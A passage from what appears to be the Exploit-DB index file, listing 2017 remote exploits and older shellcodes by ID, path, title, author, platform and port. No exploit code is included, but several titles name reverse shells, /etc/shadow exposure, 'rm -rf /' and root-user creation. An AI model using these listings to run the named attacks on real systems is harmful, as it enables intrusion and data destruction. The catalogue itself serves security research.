(Metasploit)",2017-09-13,"James Fitts",windows,remote, -42692,exploits/php/remote/42692.rb,"Trend Micro Control Manager - ImportFile Directory Traversal Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",php,remote, -42693,exploits/windows/remote/42693.rb,"Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote, -42694,exploits/windows/remote/42694.rb,"Sielco Sistemi Winlog 2.07.16 - Remote Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,46824 -42695,exploits/linux/remote/42695.rb,"Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)",2014-06-13,"James Fitts",linux,remote, -42696,exploits/windows/remote/42696.rb,"Motorola Netopia Netoctopus SDCS - Remote Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,3814 -42697,exploits/linux/remote/42697.rb,"Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit)",2014-08-14,"James Fitts",linux,remote, -42698,exploits/jsp/remote/42698.rb,"Infinite Automation Mango Automation - Command Injection (Metasploit)",2017-09-13,"James Fitts",jsp,remote, -42700,exploits/windows/remote/42700.rb,"Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack-Based Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote, -42701,exploits/java/remote/42701.rb,"EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",java,remote, -42702,exploits/java/remote/42702.rb,"EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",java,remote, -42703,exploits/windows/remote/42703.rb,"Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote, -42704,exploits/windows/remote/42704.rb,"Cloudview NMS < 2.00b - Arbitrary File Upload (Metasploit)",2017-09-13,"James Fitts",windows,remote, -42708,exploits/linux/remote/42708.rb,"Alienvault OSSIM av-centerd Util.pm sync_rserver - Command Execution (Metasploit)",2017-09-13,"James Fitts",linux,remote,40007 -42709,exploits/linux/remote/42709.rb,"Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)",2017-09-13,"James Fitts",linux,remote,40007 -42711,exploits/windows/remote/42711.txt,"Microsoft Windows .NET Framework - Remote Code Execution",2017-09-13,Voulnet,windows,remote, -42719,exploits/windows/remote/42719.rb,"EMC AlphaStor Library Manager < 4.0 build 910 - Opcode 0x4f Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,3500 -42720,exploits/windows/remote/42720.rb,"EMC AlphaStor Device Manager - Opcode 0x72 Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,3000 -42721,exploits/windows/remote/42721.rb,"Lockstep Backup for Workgroups 4.0.3 - Remote Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,2125 -42722,exploits/windows/remote/42722.rb,"Disk Pulse Server 2.2.34 - 'GetServerInfo' Remote Buffer Overflow (Metasploit)",2010-10-19,"James Fitts",windows,remote, -42723,exploits/windows/remote/42723.rb,"haneWIN DNS Server 1.5.3 - Remote Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,53 -42724,exploits/windows/remote/42724.rb,"KingScada AlarmServer 3.1.2.13 - Remote Stack Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,12401 -42725,exploits/windows/remote/42725.rb,"Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)",2017-09-14,"James Fitts",windows,remote,69 -42726,exploits/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",hardware,remote, -42753,exploits/multiple/remote/42753.txt,"Tecnovision DLX Spot - SSH Backdoor Access",2017-05-19,"Simon Brannstrom",multiple,remote, -42778,exploits/windows/remote/42778.py,"Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH)",2017-09-25,sickness,windows,remote,80 -42767,exploits/windows/remote/42767.rb,"Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow (Metasploit)",2017-09-21,Metasploit,windows,remote,80 -42780,exploits/windows/remote/42780.py,"Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow",2017-09-25,"Charles Dardaman",windows,remote, -42784,exploits/ios/remote/42784.txt,"Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response",2017-09-25,"Google Security Research",ios,remote, -42787,exploits/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor Access",2017-09-25,LiquidWorm,hardware,remote, -42790,exploits/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",linux,remote, -42793,exploits/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,multiple,remote,5858 -42806,exploits/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization",2017-09-27,SlidingWindow,java,remote, -42888,exploits/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",hardware,remote, -42891,exploits/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - MITM Remote Code Execution",2017-09-28,hyp3rlinx,windows,remote, -42928,exploits/windows/remote/42928.py,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow",2017-09-30,"Owais Mehtab",windows,remote, -42957,exploits/linux/remote/42957.py,"Unitrends UEB 9.1 - 'Unitrends bpserverd' Remote Command Execution",2017-08-08,"Jared Arave",linux,remote, -42938,exploits/linux/remote/42938.rb,"Qmail SMTP - Bash Environment Variable Injection (Metasploit)",2017-10-02,Metasploit,linux,remote, -42949,exploits/linux/remote/42949.txt,"UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Unauthenticated Root Remote Code Execution",2017-10-02,agix,linux,remote, -42952,exploits/windows/remote/42952.py,"ERS Data System 1.8.1 - Java Deserialization",2017-09-21,"West Shepherd",windows,remote, -42958,exploits/linux/remote/42958.py,"Unitrends UEB 9.1 - Authentication Bypass / Remote Command Execution",2017-08-08,"Jared Arave",linux,remote, -42964,exploits/lin_x86-64/remote/42964.rb,"Rancher Server - Docker Daemon Code Execution (Metasploit)",2017-10-09,Metasploit,lin_x86-64,remote,8080 -42965,exploits/multiple/remote/42965.rb,"OrientDB 2.2.2 < 2.2.22 - Remote Code Execution (Metasploit)",2017-10-09,Metasploit,multiple,remote,2480 -42973,exploits/windows/remote/42973.py,"VX Search Enterprise 10.1.12 - Remote Buffer Overflow",2017-10-09,"Revnic Vasile",windows,remote, -42984,exploits/windows/remote/42984.rb,"Sync Breeze Enterprise 10.1.16 - Remote Buffer Overflow (SEH) (Metasploit)",2017-10-13,wetw0rk,windows,remote, -42996,exploits/ios/remote/42996.txt,"Apple iOS 10.2 (14C92) - Remote Code Execution",2017-10-17,"Google Security Research",ios,remote, -43008,exploits/java/remote/43008.rb,"Tomcat - Remote Code Execution via JSP Upload Bypass (Metasploit)",2017-10-17,Metasploit,java,remote, -43025,exploits/windows/remote/43025.py,"Ayukov NFTP FTP Client < 2.0 - Remote Buffer Overflow",2017-10-21,"Berk Cem Göksel",windows,remote, -43030,exploits/lin_x86/remote/43030.rb,"Unitrends UEB 9 - http api/storage Remote Root (Metasploit)",2017-10-23,Metasploit,lin_x86,remote,443 -43031,exploits/lin_x86/remote/43031.rb,"Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit)",2017-10-23,Metasploit,lin_x86,remote,1743 -43032,exploits/unix/remote/43032.rb,"Polycom - Command Shell Authorization Bypass (Metasploit)",2017-10-23,Metasploit,unix,remote, -43055,exploits/hardware/remote/43055.rb,"Netgear DGN1000 1.1.00.48 - 'Setup.cgi' Unauthenticated Remote Code Execution (Metasploit)",2017-10-25,Metasploit,hardware,remote, -43059,exploits/windows/remote/43059.py,"DameWare Remote Controller < 12.0.0.520 - Remote Code Execution",2016-04-03,Securifera,windows,remote, -43061,exploits/hardware/remote/43061.txt,"MitraStar DSL-100HN-T1/GPT-2541GNAC - Privilege Escalation",2017-10-28,j0lama,hardware,remote, -43105,exploits/hardware/remote/43105.txt,"ZyXEL PK5001Z Modem - Backdoor Account",2017-10-31,"Matthew Sheimo",hardware,remote, -43112,exploits/unix/remote/43112.rb,"tnftp - 'savefile' Arbitrary Command Execution (Metasploit)",2017-11-03,Metasploit,unix,remote, -43118,exploits/hardware/remote/43118.txt,"Actiontec C1000A Modem - Backdoor Account",2017-11-04,"Joseph McDonagh",hardware,remote, -43121,exploits/windows/remote/43121.txt,"Avaya IP Office (IPO) < 10.1 - 'SoftConsole' Remote Buffer Overflow (SEH)",2017-11-05,hyp3rlinx,windows,remote, -43125,exploits/win_x86/remote/43125.html,"Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-10-17,mschenk,win_x86,remote, -43132,exploits/windows/remote/43132.rb,"Mako Server 2.5 - OS Command Injection Remote Command Execution (Metasploit)",2017-11-09,Metasploit,windows,remote, -43142,exploits/hardware/remote/43142.c,"Wireless IP Camera (P2P) WIFICAM - Unauthenticated Remote Code Execution",2017-03-08,PierreKimSec,hardware,remote,80 -43141,exploits/windows/remote/43141.py,"Ulterius Server < 1.9.5.0 - Directory Traversal",2017-11-13,"Rick Osgood",windows,remote, -43143,exploits/linux_mips/remote/43143.rb,"D-Link DIR-850L - Unauthenticated OS Command Execution (Metasploit)",2017-11-14,Metasploit,linux_mips,remote, -43145,exploits/windows/remote/43145.py,"Dup Scout Enterprise 10.0.18 - 'Login' Remote Buffer Overflow",2017-11-14,sickness,windows,remote,80 -42886,exploits/windows/remote/42886.py,"Sync Breeze Enterprise 10.1.16 - 'POST' Remote Buffer Overflow",2017-10-20,mschenk,windows,remote, -43163,exploits/windows/remote/43163.txt,"Microsoft Office - OLE Remote Code Execution",2017-11-20,embedi,windows,remote, -14113,shellcodes/arm/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode, -13241,shellcodes/aix/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode, -13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode, -13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve /bin/sh Shellcode (128 bytes)",2004-09-26,Palante,bsd_ppc,shellcode, -13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode, -13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + setuid(0) Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode, -13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve /bin/sh Shellcode (27 bytes)",2004-09-26,n0gada,bsd_x86,shellcode, -13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode, -13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes)",2004-09-26,no1,bsd_x86,shellcode, -13249,shellcodes/bsd_x86/13249.c,"BSD/x86 - Bind TCP Shell (Random TCP Port) Shellcode (143 bytes)",2004-09-26,MayheM,bsd_x86,shellcode, -13250,shellcodes/bsd_x86/13250.c,"BSD/x86 - Break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode, -13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)",2004-09-26,dev0id,bsd_x86,shellcode, -13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode, -13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes)",2004-09-26,dev0id,bsd_x86,shellcode, -13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve /bin/cat /etc/master.passwd | mail [email] Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode, -13256,shellcodes/bsd_x86/13256.c,"BSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)",2004-09-26,"Sinan Eren",bsd_x86,shellcode, -13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,bsdi_x86,shellcode, -13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,bsdi_x86,shellcode, -13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,bsdi_x86,shellcode, -13261,shellcodes/freebsd/13261.txt,"FreeBSD x86 / x64 - execve /bin/sh Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,freebsd,shellcode, -13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,freebsd_x86,shellcode, -13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse TCP cat /etc/passwd (192.168.1.33:8000/TCP) Shellcode (112 bytes)",2008-09-10,suN8Hclf,freebsd_x86,shellcode, -13264,shellcodes/freebsd_x86/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,freebsd_x86,shellcode, -13265,shellcodes/freebsd_x86/13265.c,"FreeBSD/x86 - ConnectBack (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,freebsd_x86,shellcode, -13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,freebsd_x86,shellcode, -13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000/TCP) Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode, -13268,shellcodes/freebsd_x86/13268.asm,"FreeBSD/x86 - setuid(0); + execve(ipf -Fa); Shellcode (57 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode, -13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,freebsd_x86,shellcode, -13270,shellcodes/freebsd_x86/13270.c,"FreeBSD/x86 - Bind TCP Password Shell (4883/TCP) Shellcode (222 bytes)",2006-07-19,MahDelin,freebsd_x86,shellcode, -13271,shellcodes/freebsd_x86/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,freebsd_x86,shellcode, -13272,shellcodes/freebsd_x86/13272.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (1)",2006-04-14,IZ,freebsd_x86,shellcode, -13273,shellcodes/freebsd_x86/13273.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (2)",2004-09-26,marcetam,freebsd_x86,shellcode, -13274,shellcodes/freebsd_x86/13274.c,"FreeBSD/x86 - execve /bin/sh Shellcode (37 bytes)",2004-09-26,preedator,freebsd_x86,shellcode, -13275,shellcodes/freebsd_x86/13275.c,"FreeBSD/x86 - Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)",2004-09-26,dev0id,freebsd_x86,shellcode, -13276,shellcodes/freebsd_x86/13276.c,"FreeBSD/x86 - chown 0:0 + chmod 6755 + execve /tmp/sh Shellcode (44 bytes)",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode, -13277,shellcodes/freebsd_x86/13277.c,"FreeBSD/x86 - execve /tmp/sh Shellcode (34 bytes)",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode, -13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (102 bytes)",2004-09-26,Scrippie,freebsd_x86,shellcode, -13279,shellcodes/freebsd_x86-64/13279.c,"FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",freebsd_x86-64,shellcode, -13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,freebsd_x86-64,shellcode, -13281,shellcodes/generator/13281.c,"Linux/x86 - execve Null-Free Shellcode (Generator)",2009-06-29,certaindeath,generator,shellcode, -13282,shellcodes/generator/13282.php,"Linux/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode, -13283,shellcodes/generator/13283.php,"Windows XP SP1 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode, -13284,shellcodes/generator/13284.txt,"Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,generator,shellcode, -13285,shellcodes/generator/13285.c,"Linux/x86 - Command Generator Null-Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode, -13286,shellcodes/generator/13286.c,"Windows - Reverse TCP Shell (127.0.0.1:123/TCP) Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",generator,shellcode, -13288,shellcodes/generator/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)",2006-10-22,izik,generator,shellcode, -13289,shellcodes/generator/13289.c,"Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,generator,shellcode, -13290,shellcodes/ios/13290.txt,"iOS Version-independent - Null-Free Shellcode",2008-08-21,"Andy Davis",ios,shellcode, -13291,shellcodes/hardware/13291.txt,"Cisco IOS - New TTY / Privilege Level To 15 / Reverse Virtual Terminal Shell (21/TCP) Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode, -13292,shellcodes/hardware/13292.txt,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode, -13293,shellcodes/hardware/13293.txt,"Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode, -13295,shellcodes/hp-ux/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,hp-ux,shellcode, -13296,shellcodes/lin_x86-64/13296.c,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode, -13297,shellcodes/generator/13297.c,"Linux/x86-64 - Reverse TCP Semi-Stealth /bin/bash Shell Shellcode (88+ bytes) (Generator)",2006-04-21,phar,generator,shellcode, -13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP /bin/sh Shell (4919/TCP) Shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode, -13299,shellcodes/linux_mips/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]); Shellcode (60 bytes)",2008-08-18,vaicebine,linux_mips,shellcode, -13300,shellcodes/linux_mips/13300.c,"Linux/MIPS - execve /bin/sh Shellcode (56 bytes)",2005-11-09,"Charles Stevenson",linux_mips,shellcode, -13301,shellcodes/linux_ppc/13301.c,"Linux/PPC - execve /bin/sh Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode, -13302,shellcodes/linux_ppc/13302.c,"Linux/PPC - read + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode, -13303,shellcodes/linux_ppc/13303.c,"Linux/PPC - Reverse TCP /bin/sh Shell (192.168.1.1:31337/TCP) Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode, -13304,shellcodes/linux_ppc/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,linux_ppc,shellcode, -13305,shellcodes/linux_sparc/13305.c,"Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode, -13306,shellcodes/linux_sparc/13306.c,"Linux/SPARC - Bind TCP Shell (8975/TCP) Null-Free Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode, -13307,shellcodes/lin_x86/13307.c,"Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode, -13308,shellcodes/lin_x86/13308.c,"Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode, -13309,shellcodes/lin_x86/13309.asm,"Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode, -13310,shellcodes/lin_x86/13310.c,"Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",lin_x86,shellcode, -13311,shellcodes/lin_x86/13311.c,"Linux/x86 - killall5 Polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode, -13312,shellcodes/lin_x86/13312.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode, -13313,shellcodes/lin_x86/13313.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) XOR Encoded Shellcode (152 bytes)",2009-07-10,Rick,lin_x86,shellcode, -13314,shellcodes/lin_x86/13314.c,"Linux/x86 - reboot() Polymorphic Shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",lin_x86,shellcode, -13315,shellcodes/lin_x86/13315.c,"Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",lin_x86,shellcode, -13316,shellcodes/lin_x86/13316.c,"Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,lin_x86,shellcode, -13317,shellcodes/lin_x86/13317.s,"Linux/x86 - Bind TCP Shell (8000/TCP) + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode, -13318,shellcodes/lin_x86/13318.s,"Linux/x86 - Bind TCP Shell (8000/TCP) + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode, -13319,shellcodes/lin_x86/13319.s,"Linux/x86 - Bind TCP /bin/sh Shell (8000/TCP) Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",lin_x86,shellcode, -13320,shellcodes/lin_x86-64/13320.c,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,lin_x86-64,shellcode, -13321,shellcodes/lin_x86/13321.c,"Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes)",2009-04-30,phar,lin_x86,shellcode, -13322,shellcodes/lin_x86/13322.c,"Linux/x86 - File Unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode, -13323,shellcodes/lin_x86/13323.c,"Linux/x86 - Perl Script Execution Shellcode (99+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode, -13324,shellcodes/lin_x86/13324.c,"Linux/x86 - Read /etc/passwd Shellcode (65+ bytes)",2009-02-27,certaindeath,lin_x86,shellcode, -13325,shellcodes/lin_x86/13325.c,"Linux/x86 - chmod 666 /etc/shadow + exit(0) Shellcode (30 bytes)",2009-02-20,"Jonathan Salwan",lin_x86,shellcode, -13326,shellcodes/lin_x86/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",lin_x86,shellcode, -13327,shellcodes/lin_x86/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",lin_x86,shellcode, -13328,shellcodes/generator/13328.c,"Linux/x86 - Shellcode Obfuscator Null-Free (Generator)",2008-12-09,sm4x,generator,shellcode, -13329,shellcodes/lin_x86/13329.c,"Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode, -13330,shellcodes/lin_x86/13330.c,"Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode, -13331,shellcodes/lin_x86/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes)",2008-11-19,Rick,lin_x86,shellcode, -13332,shellcodes/lin_x86/13332.c,"Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)",2008-11-18,XenoMuta,lin_x86,shellcode, -13333,shellcodes/lin_x86/13333.txt,"Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)",2008-11-13,sch3m4,lin_x86,shellcode, -13334,shellcodes/lin_x86/13334.txt,"Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes)",2008-09-29,sorrow,lin_x86,shellcode, -13335,shellcodes/lin_x86/13335.c,"Linux/x86 - iopl(3); asm(cli); while(1){} Shellcode (12 bytes)",2008-09-17,dun,lin_x86,shellcode, -13336,shellcodes/lin_x86/13336.c,"Linux/x86 - System Beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",lin_x86,shellcode, -13337,shellcodes/lin_x86/13337.c,"Linux/x86 - ConnectBack (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,lin_x86,shellcode, -13338,shellcodes/lin_x86/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,lin_x86,shellcode, -13339,shellcodes/lin_x86/13339.asm,"Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode, -13340,shellcodes/lin_x86/13340.c,"Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,lin_x86,shellcode, -13341,shellcodes/lin_x86/13341.c,"Linux/x86 - /bin/rm -rf / + Attempts To Block The Process From Being Stopped Shellcode (132 bytes)",2008-08-18,onionring,lin_x86,shellcode, -13342,shellcodes/lin_x86/13342.c,"Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)",2008-08-18,LiquidWorm,lin_x86,shellcode, -13343,shellcodes/lin_x86/13343.asm,"Linux/x86 - Raw-Socket ICMP/Checksum /bin/sh Shell Shellcode (235 bytes)",2007-04-02,mu-b,lin_x86,shellcode, -13344,shellcodes/lin_x86/13344.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes)",2007-03-09,"Kris Katterjohn",lin_x86,shellcode, -13345,shellcodes/lin_x86/13345.c,"Linux/x86 - Kill All Processes Shellcode (11 bytes)",2007-03-09,"Kris Katterjohn",lin_x86,shellcode, -13346,shellcodes/lin_x86/13346.s,"Linux/x86 - execve read Shellcode (92 bytes)",2006-11-20,0ut0fbound,lin_x86,shellcode, -13347,shellcodes/lin_x86/13347.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode, -13348,shellcodes/lin_x86/13348.c,"Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode, -13349,shellcodes/lin_x86/13349.c,"Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode, -13350,shellcodes/lin_x86/13350.c,"Linux/x86 - chmod 0666 /etc/shadow + exit Shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode, -13351,shellcodes/lin_x86/13351.c,"Linux/x86 - Fork Bomb Shellcode (7 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode, -13352,shellcodes/lin_x86/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode, -13353,shellcodes/lin_x86/13353.c,"Linux/x86 - setuid(0) + execve /bin/sh Shellcode (28 bytes)",2006-11-16,Revenge,lin_x86,shellcode, -13354,shellcodes/lin_x86/13354.c,"Linux/x86 - execve /bin/sh Shellcode (22 bytes)",2006-11-16,Revenge,lin_x86,shellcode, -13355,shellcodes/lin_x86/13355.c,"Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)",2006-10-22,izik,lin_x86,shellcode, 